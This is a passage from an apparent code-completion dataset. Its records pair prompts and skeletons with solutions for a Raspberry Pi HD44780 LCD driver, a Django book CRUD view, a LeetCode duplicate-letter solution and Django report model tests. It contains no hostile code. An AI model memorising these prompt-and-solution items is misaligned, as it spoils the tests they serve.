char_mode):\n print(hex(byte))\nself.write4bits(byte >> 4, char_mode)\nself.write4bits(byte & 15, char_mode)", "bits = bin(bits)[2:][-4:].zfill(4)\nGPIO.output(self.rs_pin, char_mode)\nfor index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\nGPIO.output(self.en_pin, False)\ndelayMicroseconds(1)\nGPIO.output(self.en_pin, True)\ndelayMicroseconds(1)\nGPIO.output(self.en_pin, False)\ndelayMicroseconds(1)"], "bodies_text": "<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "class_docstring": "Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.", "class_name": "Screen", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000379", "length_bytes": 3397, "license_type": "permissive", "methods": [{"docstring": "Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor", "name": "__init__", "signature": "def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs)"}, {"docstring": "Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.", "name": "write_byte", "signature": "def write_byte(self, byte, char_mode=False)"}, {"docstring": "Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.", "name": "write4bits", "signature": "def write4bits(self, bits, char_mode=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005381", "prompt": "Implement the Python class `Screen` described below.\n\nClass description:\nDriver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\n\nMethod signatures and docstrings:\n- def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs): Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\n- def write_byte(self, byte, char_mode=False): Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\n- def write4bits(self, bits, char_mode=False): Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.", "prompted_full_text": "Implement the Python class `Screen` described below.\n\nClass description:\nDriver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\n\nMethod signatures and docstrings:\n- def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs): Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\n- def write_byte(self, byte, char_mode=False): Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\n- def write4bits(self, bits, char_mode=False): Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\n\n<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "revision_id": "47f24116ebe3d9f7336431c20bde880d2e86793e", "skeleton": "<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n", "source": "the_stack_v2_python_sparse", "source_path": "output/drivers/pi_gpio.py", "source_repo": "samkaufman01/pyLCI", "split": "test", "star_events_count": 1} {"blob_id": "a38edfb4d11a8be7b8b782cd0d8b2d74dcbd878a", "bodies": ["try:\n book = BookInfo.objects.get(pk=pk)\nexcept:\n return Http404('数据不存在')\nbook_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\nreturn JsonResponse(book_dict)", "param_dict = json.loads(request.body.decode())\nbtitle = param_dict.get('btitle')\nbpub_date = param_dict.get('bpub_date')\nbook = BookInfo.objects.get(pk=pk)\nbook.btitle = btitle\nbook.bpub_date = bpub_date\nbook.save()\nbook_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\nreturn JsonResponse(book_dict, status=201)", "book = BookInfo.objects.get(pk=pk)\nbook.delete()\nreturn JsonResponse({}, status=204)"], "bodies_text": "<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BookView", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000380", "length_bytes": 3452, "license_type": "permissive", "methods": [{"docstring": "根据主键查询一个对象", "name": "get", "signature": "def get(self, request, pk)"}, {"docstring": "修改指定主键的对象", "name": "put", "signature": "def put(self, request, pk)"}, {"docstring": "删除指定主键的对象", "name": "delete", "signature": "def delete(self, request, pk)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006171", "prompt": "Implement the Python class `BookView` described below.\n\nClass description:\nImplement the BookView class.\n\nMethod signatures and docstrings:\n- def get(self, request, pk): 根据主键查询一个对象\n- def put(self, request, pk): 修改指定主键的对象\n- def delete(self, request, pk): 删除指定主键的对象", "prompted_full_text": "Implement the Python class `BookView` described below.\n\nClass description:\nImplement the BookView class.\n\nMethod signatures and docstrings:\n- def get(self, request, pk): 根据主键查询一个对象\n- def put(self, request, pk): 修改指定主键的对象\n- def delete(self, request, pk): 删除指定主键的对象\n\n<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "revision_id": "63ae6891d3be243c5c46329e65fcf47133c5890f", "skeleton": "<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BookView:\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n", "source": "the_stack_v2_python_sparse", "source_path": "pro_drf/demo1/booktest/views.py", "source_repo": "yongfang117/pro_useful_code", "split": "test", "star_events_count": 0} {"blob_id": "d23afe80842f6ed92145de531f1ed1e14d4f19fb", "bodies": ["remain = collections.Counter(s)\nstack = list()\nfor c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\nreturn ''.join(stack)", "rindex = {x: i for i, x in enumerate(s)}\nstack = list()\nfor i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\nreturn ''.join(stack)"], "bodies_text": "<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000381", "length_bytes": 1879, "license_type": "no_license", "methods": [{"docstring": "类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1", "name": "removeDuplicateLetters1", "signature": "def removeDuplicateLetters1(self, s: str) -> str"}, {"docstring": "记录每个字符最右的索引,用于是否从栈中弹出", "name": "removeDuplicateLetters2", "signature": "def removeDuplicateLetters2(self, s: str) -> str"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeDuplicateLetters1(self, s: str) -> str: 类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\n- def removeDuplicateLetters2(self, s: str) -> str: 记录每个字符最右的索引,用于是否从栈中弹出", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeDuplicateLetters1(self, s: str) -> str: 类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\n- def removeDuplicateLetters2(self, s: str) -> str: 记录每个字符最右的索引,用于是否从栈中弹出\n\n<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n", "source": "the_stack_v2_python_sparse", "source_path": "316_remove-duplicate-letters.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": "cefbd0464db5762ad670394baf0502c961302603", "bodies": ["self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\nself.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\nself.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\nreport1 = Report.objects.create(caffe=self.caffe)\nreport2 = Report.objects.create(caffe=self.caffe)\nreport3 = Report.objects.create(caffe=self.caffe)\nreport4 = Report.objects.create(caffe=self.caffe)\nfirst_cat = Category.objects.create(name='first', caffe=self.caffe)\nsecond_cat = Category.objects.create(name='second', caffe=self.caffe)\ngram = Unit.objects.create(name='gram', caffe=self.caffe)\nliter = Unit.objects.create(name='liter', caffe=self.caffe)\nproduct1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\nproduct2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\nproduct3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\nproduct4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\nFullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\nFullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\nFullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\nFullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)", "self.assertEqual(Report.objects.count(), 4)\nreport = Report.objects.first()\nself.assertEqual(report.caffe, self.caffe)", "report1 = Report.objects.get(id=1)\nproduct = FullProduct.objects.first().product\nwith self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)", "Report.objects.create(caffe=self.caffe, creator=self.user)\nwith self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)"], "bodies_text": "<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "class_docstring": "Report tests.", "class_name": 